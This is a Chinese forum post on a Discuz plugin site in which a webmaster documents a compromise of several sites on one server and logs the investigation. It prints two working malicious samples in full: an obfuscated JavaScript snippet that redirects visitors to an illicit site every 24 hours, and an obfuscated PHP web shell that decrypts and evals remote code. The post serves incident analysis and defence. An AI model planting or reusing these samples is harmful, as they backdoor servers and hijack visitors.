马上注册,免费下载更多dz插件网资源。
您需要 登录 才可以下载或查看,没有账号?立即注册
×
网站被人偷偷植入了下面的木马,偷偷24小时跳转一次到黑产。
目前不太确定漏洞在哪里,文末公布排查记录。
- (function(){ var _0xa1b2 = "aHR0cHM6Ly9hdi5ydW4="; // var _0xc3d4 = "cmVkaXJlY3RlZA=="; // var _0xd5e6 = "MjQ="; // 24小时 function _0xf7g8(_0x9h0i){ return atob(_0x9h0i); } // function _0xj1k2(_0xl3m, _0xn4o){ var _0xp5q = new Date(); _0xp5q.setTime(_0xp5q.getTime() + (_0xn4o * 60 * 60 * 1000)); document.cookie = _0xl3m + "=1;expires=" + _0xp5q.toUTCString() + ";path=/"; } function _0xr6s(_0xt7u){ var _0xv8w = document.cookie.match(new RegExp("(^| )" + _0xt7u + "=([^;]+)")); return _0xv8w ? _0xv8w[2] : null; } window.addEventListener("load", function() { var _0xurl = _0xf7g8(_0xa1b2); var _0xcookie = _0xf7g8(_0xc3d4); var _0xexpire = parseInt(_0xf7g8(_0xd5e6)); if (!_0xr6s(_0xcookie)) { _0xj1k2(_0xcookie, _0xexpire); eval("window['\x6c\x6f\x63\x61\x74\x69\x6f\x6e']['\x68\x72\x65\x66'] = _0xurl;"); } });})();
网页源码被篡改时间大概是这个。
===================================
最新排查记录:
2025.5.23 9:00 发现不止一个网站被植入,同一个服务器的多个网站被植入相同的代码,有没有可能是宝塔的漏洞或者是系统的漏洞?没有开通宝塔企业版,很多查杀功能用不了。
2025.5.23 10:00 宝塔面板里设置了open_basedir防止跨站攻击。这样说,webshell如果只修改了一个站,不可能所有站都能修改吧。
2025.5.23 10:20 发现这个ssh被攻击80多万次。如图:
2025.5.23 11:20 发现第一个木马。dh.xxxxxx.cn\files\upload/img_678dba4d31bb1.php 网站程序是采用六零导航页,文件植入时间2025.1.20 10:51。
- Hello Administrator!WelCome To Tas9er PHP Console!<?php@error_reporting(0);session_start(); $govIZJXkkPZ= base64_decode(base64_decode("TVRaaFkyRmpZekExWVdGbVlXWTI=")).chr(55); $_SESSION['k']=$govIZJXkkPZ; session_write_close(); $govPQ=base64_decode(base64_decode("YjJKMWFHRnZjbkJtTlhWM05EUmtkbTl4")); $govi7i1l1kf='openssl'; $gov8G=govQJI($govPQ); $gov7TSqOX2B5AkEwxD="file_g".chr(101)."t_"."con".base64_decode("dGVudHM="); $govaVW=$gov7TSqOX2B5AkEwxD($gov8G); if(!extension_loaded($govi7i1l1kf)) { $govc="base64_"."decode"; $govaVW=$govc("/*X]-DP@i*/".$govaVW); for($i=0;$i<strlen($govaVW);$i++) { } } $govaVW=openssl_decrypt($govaVW, base64_decode(base64_decode("UVVWVE1UST0=")).chr(56), $govIZJXkkPZ); $govH7fm2l8=explode('|',$govaVW); $govVai9X1uHnV9=$govH7fm2l8[1]; class govEFO{public function __invoke($p) {eval("/*X]-DP@i*/".$p."");}} @call_user_func(new govEFO(),$govVai9X1uHnV9); function govQJI($gov84T8xX){ $di15 = ''; $govlHpFcRK = (6434+30541)*intval(chr(48)); $gov0m2hSQpX = (1258-1818)*intval(chr(48)); for ($i = 0, $j = strlen($gov84T8xX); $i < $j; $i++){ $govlHpFcRK <<= 5; if ($gov84T8xX[$i] >= 'a' && $gov84T8xX[$i] <= 'z'){ $govlHpFcRK += (ord($gov84T8xX[$i]) - 97); } elseif ($gov84T8xX[$i] >= '2' && $gov84T8xX[$i] <= '7') { $govlHpFcRK += (24 + $gov84T8xX[$i]); } else { exit(1); } $gov0m2hSQpX += 5; while ($gov0m2hSQpX >= 8){ $gov0m2hSQpX -= 8; $di15 .= chr($govlHpFcRK >> $gov0m2hSQpX); $govlHpFcRK &= ((1 << $gov0m2hSQpX) - 1);}} return $di15;}?>
©DZ插件网所发布的一切资源仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。
本站内容为站长个人技术研究记录或网络,不提供用户交互功能,所有内容版权归原作者所有。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,得到更好的正版服务。
您在本站任何的赞助购买、下载、查阅、回复等行为等均表示接受并同意签订《DZ插件网免责声明协议》。
如有侵权请邮件与我们联系处理: discuzaddons@vip.qq.com 并出示相关证明以便删除。敬请谅解!
|
HUX问答互助平台 1.7 商业版(hux_zhidao)548 人气#Discuz!插件模板
克米设计-APP手机版 v3.5.1最终修复完整干4272 人气#Discuz!插件模板
克米设计-帖子封面 v1.2(comiis_threadcove162 人气#Discuz!插件模板![克米设计-APP手机版v3.6全套插件模板2025版再更新版干净优化版[大量美化优化整理版 20250222版]](https://static.dz-x.net/block/95/95034d6ef29f6ae26b0087e331184515.jpg)
克米设计-APP手机版v3.6全套插件模板2025版316 人气#Discuz!插件模板
与dz-x.net同款首页聊天室3.5.0最新汉化版271 人气#Discuz!插件模板
与dz-x.net同款首页聊天室 最终汉化版!1981 人气#Discuz!插件模板
/1 
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
